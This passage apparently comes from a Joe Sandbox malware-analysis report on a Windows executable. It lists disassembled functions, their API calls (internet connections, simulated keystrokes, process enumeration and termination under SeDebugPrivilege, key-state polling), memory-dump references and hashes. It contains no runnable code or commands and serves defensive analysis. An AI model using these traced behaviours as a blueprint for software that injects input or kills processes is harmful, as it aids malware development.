                                                                                                                                                                                                                                                                              • Opcode ID: 2bec96b21cb091db9f494cbdd8e411b205b25245a83c982ca065de67c26c520d
                                                                                                                                                                                                                                                                              • Instruction ID: 3f77186e1af969603ecfc192e8875c33d5402ff1655efb39457c6663e1d0420d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2bec96b21cb091db9f494cbdd8e411b205b25245a83c982ca065de67c26c520d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AC1497990464AEBDB10CFA8C940BFEB7B2FF08310F14841AE995E7250DB38A951DB64
                                                                                                                                                                                                                                                                              Function 0072D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                              • Opcode ID: 41921c6d10ff66830dd1d91cab77e1724d891f54d2800adb3de78b1be7d8bdff
                                                                                                                                                                                                                                                                              • Instruction ID: 537925bb6869b7959dd397dd9fa4c423dd3353085ce433fa375b68c5d675f6f1
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41921c6d10ff66830dd1d91cab77e1724d891f54d2800adb3de78b1be7d8bdff
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E061F671A04330EFDB31AF74F885AA97BE4AF02320F54416DE945A7283E63DDD418B95
                                                                                                                                                                                                                                                                              Function 0076CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0076CBC7
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0076CBDA
                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 0076CBEE
                                                                                                                                                                                                                                                                                • Part of subcall function 0076CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0076CCB7
                                                                                                                                                                                                                                                                                • Part of subcall function 0076CC98: GetLastError.KERNEL32 ref: 0076CD67
                                                                                                                                                                                                                                                                                • Part of subcall function 0076CC98: SetEvent.KERNEL32(?), ref: 0076CD7B
                                                                                                                                                                                                                                                                                • Part of subcall function 0076CC98: InternetCloseHandle.WININET(00000000), ref: 0076CD86
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 337547030-0
                                                                                                                                                                                                                                                                              • Opcode ID: 90afb1aeb1d493b83fabe6863910a7790812a8e40f6edcec779845ddf9a983d9
                                                                                                                                                                                                                                                                              • Instruction ID: 0b51cef82f1e6dbe6f6d11b777d8fe61cfed06a0bf80df5cfa0fb1c172376eb3
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90afb1aeb1d493b83fabe6863910a7790812a8e40f6edcec779845ddf9a983d9
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A317A71601705AFDB229FB5DD48A7ABBF8FF04310B14852DF89B92610D739EC14ABA0
                                                                                                                                                                                                                                                                              Function 00752EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00754393: GetWindowThreadProcessId.USER32(?,00000000), ref: 007543AD
                                                                                                                                                                                                                                                                                • Part of subcall function 00754393: GetCurrentThreadId.KERNEL32 ref: 007543B4
                                                                                                                                                                                                                                                                                • Part of subcall function 00754393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00752F00), ref: 007543BB
                                                                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00752F0A
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00752F28
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00752F2C
                                                                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00752F36
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00752F4E
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00752F52
                                                                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00752F5C
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00752F70
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00752F74
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                              • Opcode ID: c4d25a07cd79ebfa3ec64a435c73f15204ba7d8eb35f522e336d49b7a9461dbd
                                                                                                                                                                                                                                                                              • Instruction ID: 52edc6a2d6b5bddcf0ea7f5542b02beb371c0dd96b9b718b634b44aa01bb4986
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c4d25a07cd79ebfa3ec64a435c73f15204ba7d8eb35f522e336d49b7a9461dbd
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4501D830784214BBFB206B689C8EF593F5ADF4DB52F214011F718AE1E4C9E568448AAD
                                                                                                                                                                                                                                                                              Function 00752150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00751D95,?,?,00000000), ref: 00752159
                                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00751D95,?,?,00000000), ref: 00752160
                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00751D95,?,?,00000000), ref: 00752175
                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00751D95,?,?,00000000), ref: 0075217D
                                                                                                                                                                                                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00751D95,?,?,00000000), ref: 00752180
                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00751D95,?,?,00000000), ref: 00752190
                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00751D95,00000000,?,00751D95,?,?,00000000), ref: 00752198
                                                                                                                                                                                                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00751D95,?,?,00000000), ref: 0075219B
                                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,007521C1,00000000,00000000,00000000), ref: 007521B5
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                              • Opcode ID: 10c710814bf9f5a73e178aaba34e2a69f403a821dec719f161697508ba13d3a8
                                                                                                                                                                                                                                                                              • Instruction ID: 536d555750e00671413d019f6af9eb4d50442038614107af9af0423b68aad172
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10c710814bf9f5a73e178aaba34e2a69f403a821dec719f161697508ba13d3a8
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF01ACB5680308BFE620ABA5DC8DF677BACEB89711F118411FA05DB1E1C6749C04CB24
                                                                                                                                                                                                                                                                              Function 0075CE7B Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 191windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F41EA: _wcslen.LIBCMT ref: 006F41EF
                                                                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0075CF99
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0075CFE0
                                                                                                                                                                                                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0075D047
                                                                                                                                                                                                                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0075D075
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                              • String ID: ,*|$0$<*|
                                                                                                                                                                                                                                                                              • API String ID: 1227352736-3361180636
                                                                                                                                                                                                                                                                              • Opcode ID: b536a7266c7f0128fcdb5a0ff2254ad6666635ec161d40af367a3f1d81e23559
                                                                                                                                                                                                                                                                              • Instruction ID: ef6bfc7d50f961a4bd9d03fcaa052a237a436a2830e20352d15bc303ec392dc9
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b536a7266c7f0128fcdb5a0ff2254ad6666635ec161d40af367a3f1d81e23559
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B51CF71604300AFD735AE28C849BAFB7E8AB45315F040A2DFD99D21D1DBF8CD4A8792
                                                                                                                                                                                                                                                                              Function 0077AB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 0075DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 0075DDAC
                                                                                                                                                                                                                                                                                • Part of subcall function 0075DD87: Process32FirstW.KERNEL32(00000000,?), ref: 0075DDBA
                                                                                                                                                                                                                                                                                • Part of subcall function 0075DD87: CloseHandle.KERNEL32(00000000), ref: 0075DE87
                                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0077ABCA
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0077ABDD
                                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0077AC10
                                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0077ACC5
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 0077ACD0
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0077AD21
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                              • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                              • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                              • Opcode ID: 234f4de4112cc15083b623c53b64572f0a8ffea6f670c9fe5ace693dce2db6be
                                                                                                                                                                                                                                                                              • Instruction ID: d68fcec05b95008367d276a35c5529a5f3fa14b485851f2c7190767dff2bb622
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 234f4de4112cc15083b623c53b64572f0a8ffea6f670c9fe5ace693dce2db6be
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5061A170204242AFE721DF14C499F29BBE1AF84358F14C49CE4598BBA3C779EC45CB92
                                                                                                                                                                                                                                                                              Function 00784322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007843C1
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 007843D6
                                                                                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007843F0
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00784435
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00784462
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00784490
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                              • String ID: SysListView32
                                                                                                                                                                                                                                                                              • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                              • Opcode ID: 4edf302dba4d5cfe28b9d13aee36f72f70f6637e05d506ddc87e01fbdcc53cc5
                                                                                                                                                                                                                                                                              • Instruction ID: 93a2f9828ebdaf44e133553709d1eb909f029d22271e7b746acf31f53fd093b4
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4edf302dba4d5cfe28b9d13aee36f72f70f6637e05d506ddc87e01fbdcc53cc5
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8741B471940319ABDF21AF64CC49FEA7BA9FF48350F10052AF958E7291D7B99D80CB90
                                                                                                                                                                                                                                                                              Function 0075C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0075C6C4
                                                                                                                                                                                                                                                                              • IsMenu.USER32(00000000), ref: 0075C6E4
                                                                                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 0075C71A
                                                                                                                                                                                                                                                                              • GetMenuItemCount.USER32(00D00380), ref: 0075C76B
                                                                                                                                                                                                                                                                              • InsertMenuItemW.USER32(00D00380,?,00000001,00000030), ref: 0075C793
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                              • String ID: 0$2
                                                                                                                                                                                                                                                                              • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                              • Opcode ID: 0fc2dd105f8dbfab0375f67b17109e738f72ed9c7c7f58d0e46dbe5b830fbe7e
                                                                                                                                                                                                                                                                              • Instruction ID: 300366af8697c23248878c30a9e6009c21baf79bcad742ebe541192bedec15f9
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fc2dd105f8dbfab0375f67b17109e738f72ed9c7c7f58d0e46dbe5b830fbe7e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87519F706003049FDF12CF68C988BEDBBF4AB58315F24495AED1197691E3B89D48CF51
                                                                                                                                                                                                                                                                              Function 006F19CD Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121keyboardCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 006F19E1
                                                                                                                                                                                                                                                                              • ScreenToClient.USER32(00000000,?), ref: 006F19FE
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000001), ref: 006F1A23
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000002), ref: 006F1A3D
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                              • String ID: $'o$$'o
                                                                                                                                                                                                                                                                              • API String ID: 4210589936-2961772314
                                                                                                                                                                                                                                                                              • Opcode ID: 57f352993ffadffb0ba23e7844fb786352025a034e79c22d3f12056c6b4b0653
                                                                                                                                                                                                                                                                              • Instruction ID: 6bab17d907fddb1b36c4d6614f79d2be4354f7a2cbf0b8ebd2ebfcfb64bc0494
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57f352993ffadffb0ba23e7844fb786352025a034e79c22d3f12056c6b4b0653
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72418071A0450EFFEF15AF68C844BFEB775FB05364F20821AE429A6290D7386E50CB51
                                                                                                                                                                                                                                                                              Function 007886FC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00788740
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00788765
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0078877D
                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 007887A6
                                                                                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0076C1F2,00000000), ref: 007887C6
                                                                                                                                                                                                                                                                                • Part of subcall function 006F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006F24B0
                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 007887B1
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                              • String ID: (|
                                                                                                                                                                                                                                                                              • API String ID: 2294984445-3772712737
                                                                                                                                                                                                                                                                              • Opcode ID: 12cb49408ba40de86bf3380da28952495c8ea3f73cd9afa6eb09080a009ffcdf
                                                                                                                                                                                                                                                                              • Instruction ID: 8e8239427822240aa258a6b696388b61db1e572b989776df7de5d707f86ab4c1
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12cb49408ba40de86bf3380da28952495c8ea3f73cd9afa6eb09080a009ffcdf
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 812192716902459FCB64AF78CC08B6A37B6EB44375F74862DF926D21E0EF389850CB15
                                                                                                                                                                                                                                                                              Function 0075D11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 0075D1BE
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
